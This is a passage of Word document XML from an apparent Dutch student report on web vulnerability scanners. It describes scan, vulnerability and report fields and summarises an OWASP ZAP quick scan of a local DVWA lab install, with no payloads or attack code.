          <w:p w14:paraId="2CFB947A" w14:textId="77777777" w:rsidR="00CB3E4B" w:rsidRDefault="00CB3E4B" w:rsidP="00CB3E4B">
            <w:r>
              <w:t>Scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3E4B" w14:paraId="788077C8" w14:textId="77777777" w:rsidTr="00CB3E4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A17B429" w14:textId="77777777" w:rsidR="00CB3E4B" w:rsidRDefault="00CB3E4B" w:rsidP="00CB3E4B">
            <w:r>
              <w:t>Doelwit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A67504D" w14:textId="77777777" w:rsidR="00CB3E4B" w:rsidRDefault="00CB3E4B" w:rsidP="00CB3E4B">
            <w:r>
              <w:t>Base URL van website</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3E4B" w14:paraId="6E69795A" w14:textId="77777777" w:rsidTr="00CB3E4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73801D61" w14:textId="77777777" w:rsidR="00CB3E4B" w:rsidRDefault="00CB3E4B" w:rsidP="00CB3E4B">
            <w:r>
              <w:t>Scan Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14F3F778" w14:textId="77777777" w:rsidR="00CB3E4B" w:rsidRDefault="00CB3E4B" w:rsidP="00CB3E4B">
            <w:r>
              <w:t>Er zijn 6 verschillende scan soorten.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3E4B" w14:paraId="3EC6070F" w14:textId="77777777" w:rsidTr="00CB3E4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F616BD4" w14:textId="77777777" w:rsidR="00CB3E4B" w:rsidRDefault="00CB3E4B" w:rsidP="00CB3E4B">
            <w:r>
              <w:t>Rooster</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="377280DA" w14:textId="77777777" w:rsidR="00CB3E4B" w:rsidRDefault="00CB3E4B" w:rsidP="00CB3E4B">
            <w:r>
              <w:t>Dit geeft aan wanneer een scan is ingepland</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3E4B" w14:paraId="2F71D240" w14:textId="77777777" w:rsidTr="00CB3E4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E099873" w14:textId="77777777" w:rsidR="00CB3E4B" w:rsidRDefault="00CB3E4B" w:rsidP="00CB3E4B">
            <w:r>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="612A50FD" w14:textId="77777777" w:rsidR="00CB3E4B" w:rsidRDefault="00CB3E4B" w:rsidP="00CB3E4B">
            <w:r>
              <w:t>Dit geeft de voortgang van de scan aan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3E4B" w14:paraId="761E1A4B" w14:textId="77777777" w:rsidTr="00CB3E4B">
        <w:trPr>
          <w:trHeight w:val="114"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C9BC102" w14:textId="77777777" w:rsidR="00CB3E4B" w:rsidRDefault="00CB3E4B" w:rsidP="00CB3E4B">
            <w:r>
              <w:t>Datum</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E4848D0" w14:textId="77777777" w:rsidR="00CB3E4B" w:rsidRDefault="00CB3E4B" w:rsidP="00CB3E4B">
            <w:r>
              <w:t>Start en einde van een scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3E4B" w14:paraId="2F2092DA" w14:textId="77777777" w:rsidTr="00CB3E4B">
        <w:trPr>
          <w:trHeight w:val="114"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BE39B11" w14:textId="77777777" w:rsidR="00CB3E4B" w:rsidRDefault="00CB3E4B" w:rsidP="00CB3E4B">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Requests</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65C0C3B3" w14:textId="77777777" w:rsidR="00CB3E4B" w:rsidRDefault="00CB3E4B" w:rsidP="00CB3E4B">
            <w:r>
              <w:t xml:space="preserve">De aantal </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>HTTP</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>request</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> die gemaakt zijn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3E4B" w14:paraId="546DE77D" w14:textId="77777777" w:rsidTr="00CB3E4B">
        <w:trPr>
          <w:trHeight w:val="114"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FAE9375" w14:textId="77777777" w:rsidR="00CB3E4B" w:rsidRDefault="00CB3E4B" w:rsidP="00CB3E4B">
            <w:r>
              <w:t>Locaties</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="375BB650" w14:textId="77777777" w:rsidR="00CB3E4B" w:rsidRDefault="00CB3E4B" w:rsidP="00CB3E4B">
            <w:r>
              <w:t>Het aantal gescande webpagina</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="74945794" w14:textId="3DF4D996" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4"/>
    <w:p w14:paraId="20071629" w14:textId="0F3610D0" w:rsidR="00CB3E4B" w:rsidRDefault="00CB3E4B" w:rsidP="00554FF4"/>
    <w:p w14:paraId="282FA812" w14:textId="77777777" w:rsidR="00CB3E4B" w:rsidRDefault="00CB3E4B" w:rsidP="00554FF4"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4531"/>
        <w:gridCol w:w="4531"/>
      </w:tblGrid>
      <w:tr w:rsidR="00554FF4" w14:paraId="261E1B0C" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="79F0CE0F" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Kwetsbaarheid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="1E101881" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C00701A" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Risico level</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67D97FFE" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Geeft aan hoe gevaarlijk een kwetsbaarheid is</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="16F2C3FD" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A88CF8C" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Kwetsbaarheid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D8F2107" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Type kwetsbaarheid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="266EF7B5" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A558E75" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F471EA2" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>URL waar de kwetsbaarheid is gevonden</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="0FD6FC82" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A219FD7" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46FDC0B7" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>De parameter die gebruikt is bij de aanval</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="7FD960A3" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45A1BA67" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6878DD94" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Status van de kwetsbaarheid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="11F0F206" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="515D404E" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Laats gezien</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0178CA2E" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Datum van wanneer de kwetsbaarheid gevonden is.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="63818335" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4543"/>
        <w:gridCol w:w="4519"/>
      </w:tblGrid>
      <w:tr w:rsidR="00554FF4" w14:paraId="0322B48D" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="7A9361FA" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Rapport</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="1F148BEC" w14:textId="77777777" w:rsidTr="00D600A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4543" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65753B18" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Rapport Template</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4519" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D68F890" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Type template</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="5E7B7220" w14:textId="77777777" w:rsidTr="00D600A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4543" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7248ADE1" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Rapport Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4519" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69438613" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Type rapport</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="33ED3E5B" w14:textId="77777777" w:rsidTr="00D600A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4543" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40D60CB1" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Doelwit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4519" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EB1BEAF" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>URL van doelwit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="59FDFEA2" w14:textId="77777777" w:rsidTr="00D600A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4543" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F7DE96C" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Gemaakt op</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4519" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C70AF33" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Datum waarop rapport is gemaakt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="15A8AFC0" w14:textId="77777777" w:rsidTr="00D600A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4543" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="001E7528" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4519" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B812D04" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Vooruitgang van rapport</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C81A196" w14:textId="5A345B92" w:rsidR="00554FF4" w:rsidRPr="000D4F4B" w:rsidRDefault="000D4F4B" w:rsidP="00554FF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D4F4B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tabel 3.3.1</w:t>
      </w:r>
      <w:r w:rsidR="00554FF4" w:rsidRPr="000D4F4B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5420DED1" w14:textId="0EDAF7D0" w:rsidR="00554FF4" w:rsidRPr="00AB12E4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB12E4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Test van OWASP ZAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C10E447" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t>OWASP ZAP configuratie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F121DEE" w14:textId="6FA81D11" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">OWASP ZAP werkt als een proxy die http </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>requests</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/responses onderschept tussen browsers en webservers. Hiervoor heb ik een </w:t>
      </w:r>
      <w:r w:rsidR="00BC587F">
        <w:t>proxynetwerk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> opgezet op mijn lokale server met de port nummer: 81. Zodra de webbrowser: localhost:81 verbinding maakt met de webserver: 192.168.0.101 zal OWASP ZAP de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>http communicatie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> onderscheppen en het uitlezen en aanpassen zodat er aanvallen verricht kunnen worden. De sitemap van DVWA bestaat uit een aantal sub mappen waaronder de sitemap </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulnerabilities</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, hierin staan de pagina’s waar aanvallen verricht kunnen worden. Een normale </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>quick</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scan slaat deze map over. Om OWASP ZAP naar deze map te wijzen moet er een nieuwe Context gemaakt worden van de sitemap </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulnerbilities</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Zo kan OWASP ZAP de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>submappen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> probleemloos vinden. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75131EC1" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="001B33AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D37ABB">
        <w:t xml:space="preserve">Target: </w:t>
      </w:r>
      <w:r>
        <w:t>http://192.168.0.101</w:t>
      </w:r>
      <w:r w:rsidRPr="00D37ABB">
        <w:t xml:space="preserve"> – dit is de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> van de </w:t>
      </w:r>
      <w:r w:rsidRPr="00D37ABB">
        <w:t>doelwit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798FD682" w14:textId="27DD33FD" w:rsidR="00554FF4" w:rsidRDefault="00BC587F" w:rsidP="001B33AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Proxyserver</w:t>
      </w:r>
      <w:r w:rsidR="00554FF4">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidR="00554FF4" w:rsidRPr="00D325C8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://localhost:81</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1E2537EF" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="001B33AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Context: http://192.168.0.101/vulnerbilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DF854C" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="001B33AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Authenticatie: username: ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’ &amp; password: ‘password’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E09744C" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="001B33AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Scan type: Quick scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBF7096" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t>Scan Resultaat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4EF053" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">Vanwege de kleine scope zijn er veel minder </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> gedaan wat </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>er voor</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> zorgde dat de scan sneller klaar was.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71668514" w14:textId="64857412" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="001B33AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">De scan </w:t>
      </w:r>
      <w:r w:rsidR="00A84A18">
        <w:t>heeft 19</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> seconde geduurd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050C43CF" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="001B33AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Er zijn 3,073 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> gedaan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42921346" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="001B33AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Er zijn 170 locaties gevonden en gescand.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FA2B4F" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="001B33AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gevonden </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kwetbaarheden</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="305C6F75" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="001B33AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Er zijn 2 hoge kwetsbaarheden gevonden met een hoge risico</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652CBBC9" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="001B33AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Er zijn 4 kwetsbaarheden gevonden met een medium risico</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002CF786" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="001B33AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Er zijn 8 kwetsbaarheden gevonden met een lage risico</w:t>
      </w:r>
    </w:p>
